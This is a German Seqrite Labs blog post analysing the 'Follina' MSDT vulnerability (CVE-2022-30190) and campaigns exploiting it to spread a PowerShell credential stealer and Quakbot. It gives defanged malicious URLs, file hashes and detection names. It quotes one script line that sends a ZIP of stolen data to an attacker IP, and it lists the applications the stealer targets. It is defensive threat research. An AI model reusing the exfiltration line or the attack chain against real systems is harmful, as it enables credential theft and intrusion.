• Produkte & Angebote
        • Wolke

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • On Prem

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Plattform

          • Malware Analysis Platform
        • Vertriebspartner

          • SOHO Total Edition
        • Services

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Cybersicherheit & Data Privacy Aufmerksamkeit
  • Lösungen
    • BFSI
    • Fachwissen
    • Behörden
    • Gesundheitswesen
    • ITeS
    • Industrie
  • Firma
    • Über uns Seqrite
    • Leadership
    • Auszeichnungen & Zertifizierungen
    • Newsroom
  • Partner
    • Partner Programm
    • Partner finden
    • PARTNER WERDEN
  • Unterstützung
  • Ressourcen
    • Blogs
    • Whitepapers
    • Datenblätter
    • Case Studies
    • Bedrohungsberichte
    • Handbücher
    • PoV
    • Ohne fundierte Kenntnisse zu Data Privacy
    • Prüfen Sie Ihre Risikobewertung
    • DPDP-Dialoge
    • Stunde der Privatsphäre
Seqrite Labs Blog
Vertrieb kontaktieren Angegriffen?
  • Produkte & Angebote
        • Wolke

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • On Prem

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Plattform

          • Malware Analysis Platform
        • Vertriebspartner

          • SOHO Total Edition
        • Services

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Cybersicherheit & Data Privacy Aufmerksamkeit
  • Lösungen
    • BFSI
    • Fachwissen
    • Behörden
    • Gesundheitswesen
    • ITeS
    • Industrie
  • Firma
    • Über uns Seqrite
    • Leadership
    • Auszeichnungen & Zertifizierungen
    • Newsroom
  • Partner
    • Partner Programm
    • Partner finden
    • PARTNER WERDEN
  • Unterstützung
  • Ressourcen
    • Blogs
    • Whitepapers
    • Datenblätter
    • Case Studies
    • Bedrohungsberichte
    • Handbücher
    • PoV
    • Ohne fundierte Kenntnisse zu Data Privacy
    • Prüfen Sie Ihre Risikobewertung
    • DPDP-Dialoge
    • Stunde der Privatsphäre
Startseite  /  Internet-Sicherheit  / CVE-2022-30190: Zero-Day-Sicherheitslücke „Follina“ in MSDT in freier Wildbahn ausgenutzt
CVE-2022-30190: Zero-Day-Sicherheitslücke „Follina“ in MSDT in freier Wildbahn ausgenutzt
10 Juni 2022

CVE-2022-30190: Zero-Day-Sicherheitslücke „Follina“ in MSDT in freier Wildbahn ausgenutzt

Geschrieben von Amruta Wagh
Amruta Wagh
Internet-Sicherheit

Am 30. Mai 2022 wurde CVE-2022-30190 „FOLLINA“, eine Zero-Day-Sicherheitslücke zur Remotecodeausführung mit hohem Schweregrad (CVSS:9.3), im Microsoft Windows Support Diagnostic Tool (MSDT) entdeckt.

Dieses MSDT-Tool diagnostiziert Probleme mit Anwendungen wie Microsoft Office-Dokumenten. Ursprüngliche Angriffsvektoren wie Word-Dokumente nutzen eine Remote-Vorlagenfunktion zum Herunterladen der HTML-Datei, die dann über das URL-Protokoll das Diagnosetool (MSDT) aufruft und Schadcode ausführt. Während die anfänglichen Angriffe auf Microsoft Word beschränkt waren, wurden die Angriffsvektoren in letzter Zeit auf RTF und Outlook ausgeweitet.

Diese Sicherheitslücke wurde bereits ausgenutzt. Angreifer, die sie erfolgreich nutzen, können beliebigen Code ausführen und zusätzliche Programme installieren. Sie nutzen diese Schwachstelle, um Backdoors, AsyncRAT, Quakbot und andere Schadsoftware an Verbraucher und Branchen in Nordamerika und Europa zu verbreiten.

Detaillierte Analyse der Sicherheitslücke:

Die erste aufrufende Anwendung für das MSDT-Tool ist Microsoft Office (Word, Excel, RTF usw.).

Abb. Flussdiagramm

Unten sehen Sie ein Beispiel für ein RTF-Beispiel mit dem Namen „Employment_Agreement_Template“. Diese RTF-Dokumente verwenden OLE-Objekte.

Abb. RTF-Datei mit OLE-Objekte

Wenn dieses Dokument geöffnet wird, wird die folgende Meldung angezeigt:

Sobald das Opfer auf „Ja“ klickt, wird eine verschlüsselte HTML-Datei vom eingebetteten Link http[:]//45[.]76[.]53[.]253/1.html heruntergeladen, wie unten dargestellt:-

HTML-Dokumente enthalten kommentierte „A“-Zeichen am Ende der Datei, die sich unter dem Code befinden.

Abb.: Kodierte Daten in HTML-Datei

Eingebetteter Code in der HTML-Datei ruft PCWDiagnostic mit ms-msdt und dem Parameter IT_BrowseForFile auf, der PowerShell-Syntax enthält. Der dekodierte Teil der base64-kodierten Daten ist –

Abb. Dekodierte Daten

Dieser Code stoppt die msdt.exe, falls sie ausgeführt wird, stellt eine Verbindung zur URL „hXXps [:]//seller-notification [.]live/Zgfbe234dg“ her und lädt ein POWERSHELL-Skript herunter.

Der Follina-Exploit wurde verwendet, um PowerShell-basierter Stealer. Lassen Sie uns den Inhalt genauer betrachten:

Abb. Skriptinhalt Teil 1

Das Skript listet Appdata/Roaming auf und versucht, Anmeldedaten, Cookies usw. von Anwendungen wie Firefox, Opera, Yandex, Vivaldi, CentBrowser, Comodo, Chedot, Orbitum, Chromium, Slimjet, Xvast, Kinza, Iridium, CocCoc, AVAST Software, Chrome, Outlook, Thunderbird, NetSarang, Windows Live, FileZilla, MobaXterm und WeChat zu stehlen.

Der Stealer fragt die Registrierung ab, um Informationen zu den folgenden Anwendungen zu stehlen: Autodesk, MobaXterm, Oray SunLogin RemoteClient, MailMaster, Navicat, WinSCP, Microsoft Office, FTP, RAdmin usw.

Abb. Skriptinhalt Teil 2

Darüber hinaus sammelt es auch Informationen zur Maschine:

  • Systeminfo (einschließlich Hostname, Betriebssystem-bezogene Informationen, Besitzer, BIOS-Informationen, Registrierter Besitzer
    Produkt-ID, ursprüngliches Installationsdatum, Systemstartzeit, Systemhersteller, Systemmodell, Systemtyp, Prozessor, BIOS-Version, Systemgebietsschema, Zeitzone, gesamter physischer Speicher, Domäne, Anmeldeserver usw.)
  • IP-Konfiguration (über Ipconfig)
  • Workstation-Konfiguration
  • Informationen zu Benutzerkonten
  • Lokale Gruppenadministratoren
  • Produktnamenversionen

Eine ZIP-Datei wird in %temp% erstellt und an die URL gesendet:

$http_url = „hxxp://45[.]77.156[.]179:443/“ + $ip + „———-“ + $time1 + „.zip“

$time1 ist der Epochenzeitstempel, berechnet durch

Dies dient auch als Virtualisierungsprüfung.

Sehen wir uns ein weiteres Beispiel von Quakbot an:

Phishing-E-Mail mit schädlichen HTML-Anhängen lädt Archivdateien (.img) herunter (ed63c189b52e4eb663598dc0c3121e05). Dieses Archiv enthält .lnk (76390978f26d3c6d7f799257542796ce), Qbot-Nutzlast (a14d48974eab6839b1238f984b3c28d2) und doc-Datei (e7015438268464cedad98b1544d643ad).

Abb. Flussdiagramm

Die Qbot-Nutzlast in der ZIP-Datei wird über .lnk ausgeführt, und die .doc-Datei lädt die HTML-Datei herunter. Diese .html-Datei lädt wiederum eine weitere .qbot-Nutzlast herunter, indem sie Follina ausnutzt.

Hier wird die HTML-Datei von http[:]//185[.]234[.]247[.]119 heruntergeladen und enthält die in der folgenden Abbildung gezeigten Daten:-

Abb. HTML-Dateidaten

Dieses HTML stellt eine Verbindung zu den oben genannten URLs her und lädt die Quakbot-DLL (ce86511634b5420332eb6267c0e2ae2e) herunter, die dann über regsvr32.exe ausgeführt wird.

Analyse:

 Diese Quakbot-Datei ist eine Delphi-kompilierte Datei mit verschlüsselten Daten im .rsrc-Abschnitt innerhalb von RCDATA, die im virtuell zugewiesenen Speicher entschlüsselt werden. Die folgenden Abbildungen zeigen die verschlüsselten Daten und die Entschlüsselungsschleife.

Abb. Verschlüsselte Daten 

Abb. Beschreibung Schleife

Dies wird in APIs entschlüsselt und 1st Stage-PE-Datei

Der Ablauf geht nun zur ersten Stufe über, die für die DLL-Injektion zuständig ist und die Quakbot-Nutzlast in den Speicher bringt. Die verschlüsselten Zeichenfolgen werden RC1-entschlüsselt, wodurch die Liste der Prozesse, z. B. AV-bezogene Prozesse usw., angezeigt wird. Werden diese ausgeführt, wird die Nutzlast beendet. In der folgenden Abbildung sehen wir die überprüften Prozesse.

Die Liste der überprüften Prozesse umfasst:

Später führt es eine Prozessinjektion in „onedrivesetup.exe“ durch:-

Qbot ist mit der Kampagne „obama186“ verbunden. Unten sehen Sie das Bild, das die C2-Verbindungen von „onedrivesetup.exe“ zeigt:

Bypass-Techniken:

Wir haben beobachtet, dass Angreifer in ihren ersten Angriffsvektoren Verschlüsselungsmethoden verwenden, um Erkennungen zu umgehen. Die folgenden Beispiele veranschaulichen dies.

Abb. Beispiel Nr. 1

Abb. Beispiel Nr. 2

Fazit:

Dies ist einer der kritischsten Zero-Day-Angriffe der letzten Zeit. Dieser CVE nutzt zahlreiche Bypass-Techniken, ist nicht behoben und kann leicht ausgenutzt werden. Sobald der Sicherheitspatch von Microsoft verfügbar ist, sollten Nutzer den Angriff umgehend beheben. Bis dahin raten wir Unternehmen, wachsam zu sein und die folgenden Maßnahmen zu ergreifen, um die Angriffsfläche und mögliche Schäden zu reduzieren. 

Zur Sanierung von „Follina“ befolgen Sie bitte die Hinweise:

 https://blogs.quickheal.com/threat-advisory-cve-2022-30190-follina-severe-zero-day-vulnerability-discovered-in-msdt/

Wie schützt Quick Heal seine Kunden?

Die vorhandenen fortschrittlichen Schutztechnologien der Quick Heal-Produkte schützen unsere Kunden vor Follina.

Wir haben in unserer Verhaltenstechnologie eine Erkennung namens „CVE_2022_30190_Follina“ für Follina. Ebenso in der Seqrite Für Produkte von Hawk Hunt gilt folgende Richtlinie: „QHIR_CVE_2022_30190_Follina“ um diesen Angriff zu identifizieren.

Nachfolgend sind die datei- und netzwerkbasierten Erkennungen für Follina aufgeführt:

1. Dateibasiert:

  • Backdoor.Turian.S28183972
  • Trojan.Qbot.S28211728
  • CVE-2022-30190.46655
  • CVE-2022-30190.46638
  • CVE-2022-30190.46635
  • CVE-2022-30190.46624

2.Netzwerkbasiert:

  • CVE-2022-30190.RCE!46674
  • CVE-2022-30190.RCE!46675

 

Fachexperten

Tejaswini Sandapolla

Amruta Wagh

 VORHERIGER ARTIKELBedrohungshinweis: CVE-2022-30190 „Follina“ – Schwerwiegender Zero-Day-Angriff …
NÄCHSTER ARTIKEL  CVE-2022-26134: Aktiv ausgenutzte Atlassian OGNL-Injection Zero-...
Amruta Wagh

Über Amruta Wagh

Amruta ist Sicherheitsforscherin bei Quick Heal Technologies. Sie interessiert sich für Malware-Analyse, Reverse Engineering und die Suche nach aktueller Malware...

Artikel von Amruta Wagh »

Verwandte Artikel

  • Warum Threat IntelJustiz ist das fehlende Glied in Ihrer Cybersicherheitsstrategie

    Juli 25, 2025
  • Gelockt und kompromittiert: Die digitale Gefahr von Honigfallen entlarven

    17. Juni 2025
  • Operation Sindoor – Anatomie einer digitalen Belagerung

    May 23, 2025
Ausgewählte Autoren
  • Seqrite
    Seqrite

    Seqrite ist ein führender Anbieter von Cybersicherheitslösungen für Unternehmen. Mit dem Fokus auf...

    Lesen Sie weitere Artikel von Seqrite
  • Jyoti Karlekar
    Jyoti Karlekar

    Ich bin eine leidenschaftliche Autorin, die gerne Inhalte über neue Technologien verfasst und...

    Lesen Sie weitere Artikel von Jyoti Karlekar
  • Bineesh P
    Bineesh P

    Ich bin ein leidenschaftlicher Cybersicherheits-Enthusiast und engagierter Autor. Mit einem besonderen Talent...

    Lesen Sie weitere Artikel von Bineesh P.
  • Sanjay Katkar
    Sanjay Katkar

    Sanjay Katkar ist der gemeinsame Geschäftsführer von Quick Heal Technologies ...

    Lesen Sie weitere Artikel von Sanjay Katkar
Themen
geeignet (25) Cyber ​​Attacke (36) Cyber-Angriffe (58) Cyberangriff (16) Cyber-Angriffe (15) Internet-Sicherheit (340) Internet-Sicherheit (34) Cyber-Bedrohung (33) Cyber-Bedrohungen (51) Datenmissbrauch (56) Datenverstöße (29) Data Loss (28) Verhinderung von Datenverlust (34) data privacy (16) Datenschutz gelesen. (34) Datensicherheit (19) DLP (50) DPDP (14) DPDPA (17) Verschlüsselung (16) Endpoint-Sicherheit (112) Unternehmenssicherheit (19) Ausnutzen (13) Datenschutz (14) Malware (76) Malware-Analyse (14) Malware-Angriff (23) MDM (27) Microsoft (15) MITRE ATT & CK (13) Netzwerksicherheit (26) Phishing (30) Ransomware (69) Ransomware-Angriff (31) Ransomware-Angriffe (31) Ransomware-Schutz (16) Seqrite (41) Seqrite Verschlüsselung (27) Seqrite EPS (33) Seqrite Services (16) Bedrohungserkennung (13) Threat IntelLigence (19) UTM (34) Verwundbarkeit (16) null vertrauen (13)
Seqrite Labs

Führender Anbieter von IT-Sicherheitslösungen für Unternehmen, der die Sicherheit von Endpunkten, Daten und Netzwerken mit erstklassigen Lösungen zur Bedrohungsprävention, -erkennung und -reaktion weltweit vereinfacht.

Lesen Sie mehr über Seqrite

Folge uns:

Abonniere unseren Newsletter

Bleiben Sie über die neuesten Trends und Erkenntnisse zur Cybersicherheit auf dem Laufenden.

Laden
Produkte & Angebote
  • Wolke
  • Endpoint Protection
  • Endpoint Detection and Response
  • Mobile Device Management
  • BYOD
  • Extended Detection and Response
  • Zero Trust Network Access
  • Data Privacy
  • On Prem
  • Endpoint Protection
  • Endpoint Detection and Response
  • Data Privacy
  • Plattform
  • Malware Analysis Platform
  • Mikrounternehmen
  • SOHO Total Edition
  • Services
  • Threat Intel
  • Digital Risk Protection Services (DRPS)
  • Ransomware Recovery as a Services (RRaaS)
  • DPDP Compliance
  • Managed Detection and Response
  • Cybersicherheit & Data Privacy Aufmerksamkeit
Ressourcen
  • Blogs
  • Whitepapers
  • Datenblätter
  • Bedrohungsberichte
  • Handbücher
  • PoV
  • Ohne fundierte Kenntnisse zu Data Privacy
  • DPDP-Dialoge
  • Einhaltung von Richtlinien
  • EULA
  • GoDeep.AI
  • SIA
  • Stunde der Privatsphäre
Kontakt
  • Sitz der Gesellschaft
  • Reden wir über Cybersicherheit
Unterstützung
  • Technischer Support
  • Software herunterladen
  • Offline-Updater
  • Firmware-Upgrades
  • Upgrades, Modernisierungen & TIPs
  • Produktdokumentation
Über uns
  • Über uns Seqrite
  • Leadership
  • Auszeichnungen & Anerkennungen
  • Newsroom
Partner
  • Partner Programm
  • Partner finden
  • PARTNER WERDEN
  • Seqrite Zertifizierungsanforderungen

© 2026 Quick Heal Technologies Ltd.

Sitemap Datenschutzrichtlinien Rechtliche Hinweise Cookie-Richtlinien Nutzungsbedingungen